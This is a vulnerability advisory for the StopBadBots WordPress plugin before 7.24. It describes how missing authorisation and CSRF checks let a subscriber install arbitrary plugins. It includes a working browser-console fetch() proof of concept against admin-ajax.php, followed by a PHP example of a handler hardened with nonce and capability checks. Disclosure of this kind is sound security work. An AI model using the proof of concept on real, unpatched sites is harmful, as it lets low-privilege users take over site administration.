wpexploit | Lana Codes | WPEX-ID:8695B157-ABAC-4AA6-A022-E3AE41C03544
Nov 21, 2022 - 12:00 a.m.

StopBadBots < 7.24 - Subscriber+ Arbitrary Plugin Installation


EPSS: 0.001 (Low), Percentile: 20.3%

The plugin does not have proper authorisation and CSRF checks in an AJAX action, allowing any authenticated user, such as a subscriber, to call it and install and activate arbitrary plugins from wordpress.org.

Run the command below in the developer console of the web browser while on the blog as a subscriber user to install and activate the classic-editor plugin.

fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: new Headers({
        'Content-Type': 'application/x-www-form-urlencoded',
    }),
    body: 'action=stopbadbots_install_plugin&slug=classic-editor',
    redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
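For contrast, an added example (not StopBadBots' own code, and not the fix shipped in 7.24) of how a handler for this admin-ajax action enforces the two checks the advisory says are missing, a nonce for CSRF and a capability check for authorisation, before touching the installer; the function name sbb_example_install_plugin and the nonce field name are assumptions, the WordPress core APIs are real.

```php
<?php
// Added illustration, not the plugin's code. Registers only the wp_ajax_ hook
// (logged-in users); no wp_ajax_nopriv_ variant, so anonymous calls never reach it.
add_action( 'wp_ajax_stopbadbots_install_plugin', 'sbb_example_install_plugin' );

function sbb_example_install_plugin() {
    // CSRF: the request must carry a nonce bound to this action and this user.
    // The admin page issuing the request embeds wp_create_nonce( 'stopbadbots_install_plugin' )
    // in a field named 'nonce' (field name assumed). A forged cross-site POST lacks it and dies here.
    check_ajax_referer( 'stopbadbots_install_plugin', 'nonce' );

    // Authorisation: only users who may install and activate plugins proceed.
    // A subscriber fails both checks, so the PoC request above gets a 403.
    if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Input validation: accept only a well-formed wordpress.org slug.
    $slug = isset( $_POST['slug'] ) ? sanitize_key( wp_unslash( $_POST['slug'] ) ) : '';
    if ( '' === $slug || ! preg_match( '/^[a-z0-9-]{1,64}$/', $slug ) ) {
        wp_send_json_error( array( 'message' => 'Invalid plugin slug.' ), 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/plugin.php';

    // Resolve the slug through the wordpress.org API rather than trusting a client-supplied URL.
    $api = plugins_api( 'plugin_information', array( 'slug' => $slug, 'fields' => array( 'sections' => false ) ) );
    if ( is_wp_error( $api ) ) {
        wp_send_json_error( array( 'message' => $api->get_error_message() ), 404 );
    }

    $upgrader  = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $installed = $upgrader->install( $api->download_link );
    if ( true !== $installed ) {
        wp_send_json_error( array( 'message' => 'Installation failed.' ), 500 );
    }

    $activated = activate_plugin( $upgrader->plugin_info() );
    if ( is_wp_error( $activated ) ) {
        wp_send_json_error( array( 'message' => $activated->get_error_message() ), 500 );
    }

    wp_send_json_success( array( 'slug' => $slug ) );
}
```

check_ajax_referer() and wp_send_json_error() both terminate the request on failure, so no explicit return is needed after them.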
